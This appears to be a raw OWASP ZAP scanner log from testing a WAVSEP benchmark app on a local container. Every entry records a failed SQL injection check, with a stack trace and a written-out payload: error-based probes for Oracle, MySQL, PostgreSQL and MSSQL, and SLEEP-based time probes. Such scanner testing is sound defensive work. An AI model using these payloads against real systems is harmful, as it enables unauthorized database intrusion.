more 9681663 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 5549=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5549=5549) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- mTli] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 5549=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5549=5549) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- mTli at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681665 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 1338 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1338=1338,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 1338 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1338=1338,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681665 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8388=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8388=8388) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8388=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8388=8388) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681666 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5114=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5114=5114) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- uztK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5114=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5114=5114) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- uztK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681666 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(4791=4791,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(4791=4791,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681667 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 9675 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9675=9675,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT 9675 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9675=9675,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681668 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1771=1771) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1771=1771) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681668 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(2692=2692,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(2692=2692,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681669 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7157=7157) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7157=7157) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681669 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6323=6323) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6323=6323) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681671 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com);(SELECT * FROM (SELECT(SLEEP(5)))eIIn)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com);(SELECT * FROM (SELECT(SLEEP(5)))eIIn)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681671 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5991=5991) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5991=5991) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681672 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))pKnw)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))pKnw)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 